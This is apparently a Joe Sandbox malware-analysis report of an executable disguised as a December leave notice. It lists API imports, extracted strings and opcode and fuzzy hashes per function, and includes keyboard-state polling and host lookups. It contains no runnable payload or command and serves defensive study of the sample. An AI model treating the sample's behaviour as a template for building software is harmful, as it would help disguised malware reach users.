                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1080873982-4153970271
                                                      • Opcode ID: dba3536307faca340730912aece79c338925704a76ce7940e198075b05c378b7
                                                      • Instruction ID: 108fe6db638bc63fe452d85568aeb8397cb795d7d50b205d5ccabaff9e8cda76
                                                      • Opcode Fuzzy Hash: dba3536307faca340730912aece79c338925704a76ce7940e198075b05c378b7
                                                      • Instruction Fuzzy Hash: E021607190021ABFCF12BF90CC4AFEE7B79FF18704F004459F5056A052DA79A518EB60
                                                      APIs
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FC7B42
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FC7B58
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FC7B69
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FC7B7B
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FC7B8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: SendString
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 890592661-1007645807
                                                      • Opcode ID: f70b40835a56da5cbf23bed3534b06d8abad1f8f20374babd97d24d68771d6b5
                                                      • Instruction ID: dae6eb11e9b91f87c0abf9d39c5d1621ec92d4380b2397166d85f7b38381b73e
                                                      • Opcode Fuzzy Hash: f70b40835a56da5cbf23bed3534b06d8abad1f8f20374babd97d24d68771d6b5
                                                      • Instruction Fuzzy Hash: 0D11B2A1A4025A79D731B3A2CC8AEFFBA7CFFD1B10F00041D7451AA081EA641D48DAB0
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00FC7794
                                                        • Part of subcall function 00F9DC38: timeGetTime.WINMM(?,75A8B400,00FF58AB), ref: 00F9DC3C
                                                      • Sleep.KERNEL32(0000000A), ref: 00FC77C0
                                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00FC77E4
                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00FC7806
                                                      • SetActiveWindow.USER32 ref: 00FC7825
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FC7833
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00FC7852
                                                      • Sleep.KERNEL32(000000FA), ref: 00FC785D
                                                      • IsWindow.USER32 ref: 00FC7869
                                                      • EndDialog.USER32(00000000), ref: 00FC787A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: fe081e1d2f815021a1e3492740c58644e015ac3578e538ebff95e87e0c2718c6
                                                      • Instruction ID: 60d0622ec3c644467613e213cc686592f143cff8e3c115f92b09d5750597a0b3
                                                      • Opcode Fuzzy Hash: fe081e1d2f815021a1e3492740c58644e015ac3578e538ebff95e87e0c2718c6
                                                      • Instruction Fuzzy Hash: C82156B4504306AFE7256BA0DECAF257F39FB44759F105018F58586289CF6B5C04EB21
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CoInitialize.OLE32(00000000), ref: 00FD034B
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FD03DE
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00FD03F2
                                                      • CoCreateInstance.OLE32(0100DA8C,00000000,00000001,01033CF8,?), ref: 00FD043E
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FD04AD
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00FD0505
                                                      • _memset.LIBCMT ref: 00FD0542
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00FD057E
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FD05A1
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00FD05A8
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00FD05DF
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 00FD05E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      • Opcode ID: 4843038424d08f0fbd998f370b2f27778ab6857c173729371dc3cf6ca3d38814
                                                      • Instruction ID: 98d0d45fe4fced200de8613af096fbb88d766236edffcd2088548a1127d4dd95
                                                      • Opcode Fuzzy Hash: 4843038424d08f0fbd998f370b2f27778ab6857c173729371dc3cf6ca3d38814
                                                      • Instruction Fuzzy Hash: D6B1E875A00109AFDB14DFA4C889EAEBBB9FF48314F148459E809EB251DB35ED41DB60
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00FC2ED6
                                                      • SetKeyboardState.USER32(?), ref: 00FC2F41
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00FC2F61
                                                      • GetKeyState.USER32(000000A0), ref: 00FC2F78
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00FC2FA7
                                                      • GetKeyState.USER32(000000A1), ref: 00FC2FB8
                                                      • GetAsyncKeyState.USER32(00000011), ref: 00FC2FE4
                                                      • GetKeyState.USER32(00000011), ref: 00FC2FF2
                                                      • GetAsyncKeyState.USER32(00000012), ref: 00FC301B
                                                      • GetKeyState.USER32(00000012), ref: 00FC3029
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00FC3052
                                                      • GetKeyState.USER32(0000005B), ref: 00FC3060
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 3080942acda3d90f549b2458d8a0b44219b14ce090fad449043daf4a65eaad67
                                                      • Instruction ID: 62a1b0761e31e15bc8f3b75878a48a0ef1003e888116d1df3e9aa1fa812484a2
                                                      • Opcode Fuzzy Hash: 3080942acda3d90f549b2458d8a0b44219b14ce090fad449043daf4a65eaad67
                                                      • Instruction Fuzzy Hash: 87513C21E0479A29FB35DBA48A12FEEBFF48F01394F08858DC5C2561C2DA549B4CD7A2
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00FBED1E
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBED30
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FBED8E
                                                      • GetDlgItem.USER32(?,00000002), ref: 00FBED99
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBEDAB
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FBEE01
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEE0F
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FBEE20
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FBEE63
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FBEE71
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FBEE8E
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FBEE9B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: fa005084785d8843c6af360ab0481bcac0fd88ecfb4062b59a182f53f1b09be2
                                                      • Instruction ID: 77f9cfbdb406cd09bd84a78207639ab9cd37d055ee1009d4237ac71a3d749134
                                                      • Opcode Fuzzy Hash: fa005084785d8843c6af360ab0481bcac0fd88ecfb4062b59a182f53f1b09be2
                                                      • Instruction Fuzzy Hash: B4513FB1B00205AFDB18CFA9CD85AAEBBBAFB88310F148129F519D7284D775DD008B10
                                                      APIs
                                                        • Part of subcall function 00F9B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F9B759,?,00000000,?,?,?,?,00F9B72B,00000000,?), ref: 00F9BA58
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F9B72B), ref: 00F9B7F6
                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00F9B88D
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00FFD8A6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD8D7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD8EE
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00F9B72B,00000000,?,?,00F9B2EF,?,?), ref: 00FFD90A
                                                      • DeleteObject.GDI32(00000000), ref: 00FFD91C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 9e016943e1a3367ccc9d2b3328f1d49a7bb58a6820fbb17f603fa502f6979f2a
                                                      • Instruction ID: 7651bd44eb8bbbae984226d2888808189b768e4bd4e4d82522549727a495068b
                                                      • Opcode Fuzzy Hash: 9e016943e1a3367ccc9d2b3328f1d49a7bb58a6820fbb17f603fa502f6979f2a
                                                      • Instruction Fuzzy Hash: 6661CF71901600DFEF369F94EA88B3577F6FF88322F14461DE18646A64C77AB880EB41
                                                      APIs
                                                        • Part of subcall function 00F9B526: GetWindowLongW.USER32(?,000000EB), ref: 00F9B537
                                                      • GetSysColor.USER32(0000000F), ref: 00F9B438
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 60c0c7a4f5d4e2ebff33fcf46a2fa7ad944a5e95396990633f5223d0ac8b0a94
                                                      • Instruction ID: 97c2ba044559672f8c9a86cd98a07a0efe754f581a94f052c41dd6b59aa524f4
                                                      • Opcode Fuzzy Hash: 60c0c7a4f5d4e2ebff33fcf46a2fa7ad944a5e95396990633f5223d0ac8b0a94
                                                      • Instruction Fuzzy Hash: 2041B531400104AFEF259F6CE989BB93B66AF45731F144261FEA58A1E6C7358C41F721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                      • String ID:
                                                      • API String ID: 136442275-0
                                                      • Opcode ID: f65edef11d415add4c4a297565c22db6c76bb5ba979e6f8457c71742fd809619
                                                      • Instruction ID: bc55637998d7f2d0cfd45f627c6cc9f484251f422003462d06a6ccd7257031bf
                                                      • Opcode Fuzzy Hash: f65edef11d415add4c4a297565c22db6c76bb5ba979e6f8457c71742fd809619
                                                      • Instruction Fuzzy Hash: 6B414FB784521DAECF61DB90DC46DCA73BCEB45310F0041A6B649E2041EE34ABE59F60
                                                      APIs
                                                      • CharLowerBuffW.USER32(0101DC00,0101DC00,0101DC00), ref: 00FCD7CE
                                                      • GetDriveTypeW.KERNEL32(?,01033A70,00000061), ref: 00FCD898
                                                      • _wcscpy.LIBCMT ref: 00FCD8C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: 774b146829c47bc93b05927ed75ee3b3a3f0de162077edd67b11384db6082dbb
                                                      • Instruction ID: 94220d505da15ab7a21b1444ca9e17340ad625a75df90061ad45f60327ca78e5
                                                      • Opcode Fuzzy Hash: 774b146829c47bc93b05927ed75ee3b3a3f0de162077edd67b11384db6082dbb
                                                      • Instruction Fuzzy Hash: F5518E35904205AFD700EF14DD92FAEB7A5FF84324F10882DF49A5B2A2EB35D905EB42
                                                      APIs
                                                      • __swprintf.LIBCMT ref: 00F893AB
                                                      • __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00FA1557: _xtow@16.LIBCMT ref: 00FA1578
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_xtow@16
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 1502193981-2263619337
                                                      • Opcode ID: 2fb13ecb0ef483d23e73dd8bb6a9c1063f87806d1be202beef375787fbf16f59
                                                      • Instruction ID: 86e3f8e989f9c551f03ce29e74bc23cea34144bbbdd3faffd1f6beaae0a63ccb
                                                      • Opcode Fuzzy Hash: 2fb13ecb0ef483d23e73dd8bb6a9c1063f87806d1be202beef375787fbf16f59
                                                      • Instruction Fuzzy Hash: C44108729042099FEB24EF74DD41FBA73E8FF48310F24446EE18AD7191EA75A941EB50
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00FEA259
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00FEA260
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00FEA273
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FEA27B
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FEA286
                                                      • DeleteDC.GDI32(00000000), ref: 00FEA28F
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FEA299
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00FEA2AD
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00FEA2B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: d95b354bce49c4256b57d6c62b041f71d60264b478ce3798a193a043f7c7499f
                                                      • Instruction ID: 24a376b36b3f023abc93f6ccb82c7afc6f2c575eb78938ca41c2ee38f5c15431
                                                      • Opcode Fuzzy Hash: d95b354bce49c4256b57d6c62b041f71d60264b478ce3798a193a043f7c7499f
                                                      • Instruction Fuzzy Hash: 9C318D31500115BBDF229FE5DC49FEA3B69FF0D360F100214FA59A6090CB3AE811EBA5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 2620052-3771769585
                                                      • Opcode ID: ffebeef6de7c8db29beaeb4fd47720192d9600a0b15b374fd31ad84a62e08e9c
                                                      • Instruction ID: 3d8224cc346b87040b5fd5efd382cab0ca400c50ef12f294e49f542d951ca32b
                                                      • Opcode Fuzzy Hash: ffebeef6de7c8db29beaeb4fd47720192d9600a0b15b374fd31ad84a62e08e9c
                                                      • Instruction Fuzzy Hash: FC11EB72908116ABDB25ABA0AD4AFD977ACEF45710F04006DF049D6041FF79DA85E760
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FA5047
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __gmtime64_s.LIBCMT ref: 00FA50E0
                                                      • __gmtime64_s.LIBCMT ref: 00FA5116
                                                      • __gmtime64_s.LIBCMT ref: 00FA5133
                                                      • __allrem.LIBCMT ref: 00FA5189
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA51A5
                                                      • __allrem.LIBCMT ref: 00FA51BC
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA51DA
                                                      • __allrem.LIBCMT ref: 00FA51F1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FA520F
                                                      • __invoke_watson.LIBCMT ref: 00FA5280
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                      • Instruction ID: e01e29a9b1b0150bb0110b4f492b4e1f8e69111eb704ecf772826518cfaf2a5c
                                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                      • Instruction Fuzzy Hash: 1171C6F2E00B17ABD7149E79CC91BAA73E8BF12B74F148229F510D6681E774D940ABD0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC4DF8
                                                      • GetMenuItemInfoW.USER32(01041708,000000FF,00000000,00000030), ref: 00FC4E59
                                                      • SetMenuItemInfoW.USER32(01041708,00000004,00000000,00000030), ref: 00FC4E8F
                                                      • Sleep.KERNEL32(000001F4), ref: 00FC4EA1
                                                      • GetMenuItemCount.USER32(?), ref: 00FC4EE5
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FC4F01
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00FC4F2B
                                                      • GetMenuItemID.USER32(?,?), ref: 00FC4F70
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FC4FB6
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4FCA
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FC4FEB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
